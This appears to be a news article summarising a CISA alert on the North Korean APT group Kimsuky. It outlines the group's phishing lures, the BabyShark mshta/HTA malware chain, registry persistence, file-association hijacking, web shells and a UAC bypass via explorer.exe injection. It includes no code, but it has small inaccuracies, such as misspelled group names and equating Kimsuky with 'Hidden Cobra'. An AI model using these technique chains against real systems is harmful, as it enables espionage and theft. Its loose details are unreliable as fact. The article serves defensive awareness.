North Korean APT Group ‘Kimsuky’ Hack Techniques and Method

The North Korean advanced persistent threat (APT) group known as Kimsuky is actively attacking commercial-sector businesses, often by posing as South Korean reporters, according to an alert from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The Department of Homeland Security CISA this week issued an Alert (AA20-301A) titled North Korean Advanced Persistent Threat Focus: Kimsuky warning U.S. businesses, and particularly those in the commercial sector, about tactics used by APT group Kimusky.

Kimsuky (known as Hidden Cobra) has been operating as a cyberespionage group since 2012 under the auspices of the regime in Pyongyang. Its mission is global intelligence gathering, CISA noted, which usually starts with spear phishing emails, watering-hole attacks, torrent shares and malicious browser extensions, in order to gain an initial foothold in target networks, These terminologies are explained in Social Engineering – The Art of Hacking. Primary targets include diplomatic and high-level organizations in Japan, South Korea and the United States, with a focus on foreign policy and national-security issues related to the Korean peninsula, nuclear policy and sanctions, CISA added. It also targets the cryptocurrency industry. CISA, FBI, and CNMF recommended targeted individuals and organizations to increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spear phishing, use of multi-factor authentication, and user awareness training.

APT Hack Tactics

Initial Acess

• By using different spear phishing methods, Kmisky gained initial access to the victim’s networks. Spear phishing is the most commonly noticed and well known tactic used by Kimsuky.
• APT stole credentials from victims that were not their usual targets and used them to host their contagious scripts and tools. It’s most likely these credentials were obtained using spear phishing and credentials harvesting scripts.
• Subdomains were created copying the victim domains. To gain trust, emails were also sent by Kimsuky containing malicious links. Pretending to be South Korean reporters, many interview type emails were sent to build rapport.
• The targets were then invited to skype interviews to discuss Korean issues. After the victim agreed on giving the interview, a malware was sent as an attachment of sorts and then later on cancelled the interview.
• Kimsuky cleverly approaches the targets to discuss topics that are relevant to them. Some other methods include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions.

Implementation

After getting the initial access, Kimsuky most likely uses the Babyshark malware or the command shell to execute, Babyshark malware is Visual Basic Script (VBS) based malware. The breakdown is as follows:

1. First, the compromised host system uses the native Microsoft Windows utility, mshta.exe, to download and execute an HTML application file from a remote system
2. The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
3. The script maintains Persistence by creating a Registry key that runs on startup.
4. It then collects system information, sends it to the operator’s command control servers, and awaits further commands.

It has been indicated by open-source reporting that Babyshark is delivered via an email message containing a link or an attachment. Kimsuky tailors email phishing messages to match its targets’ interests. Without even having to touch the physical computer hard disk, Kimsuky uses PowerShell to run executables from the internet by using the target’s memory. PowerShell scripts can be executed without invoking powershell.exe through HTA files or mshta.exe.

Persistence

Kimsuky has demonstrated the ability to establish Persistence through using malicious browser extensions, modifying system processes, manipulating the autostart execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky a.k.a Hidden Cobra can gain login and password information and/or launch malware outside of some applications that allow listing solutions.

Sometime in 2018, Kimsuky used an extension on Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers. The extension had a five-star rating, however after reading the text of the reviews these reviews were most likely left by Google+ accounts that had been compromised.

By mimicking a related operating system function or even by disguising as a software, Kimsuky might install a new service that can run at startup by using utilities to interact with services or by directly modifying the Registry keys.

During the Stolen Pencil operation in May 2018, Kimsuky used the Grease malware. A tool that can add a Windows administrator account and enable RDP while avoiding the rules of firewall. Kimsuky also uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP, a Korean word processor) documents in the Registry. The default Registry setting is manipulated by Kimsuky to open a malicious program instead of the original HWP program. Before the real HWP program opens the document, malware will read and email the content from HWP documents. This method makes the Microsoft Office users also a target.

Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; which enables the APT actor to upload, download, and delete files and directories on the compromised domains.

Privilege Escalation

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Well-known methods for Privilege Escalation are used by Kimsuky, including placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in explorer.exe. Following methods were primarily used

1. Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into explorer.exe. Irrespective of what operating system the victim is using, this malicious code decrypts its spying library from resources. It then saves the decrypted file to a disk with a random but hardcoded name in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. Escalation of privileges is thus allowed by this process.
2. Before the injection takes place, the malware sets the necessary privileges. The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within explorer.exe.

Image and Article Source link

Read more on Hacking News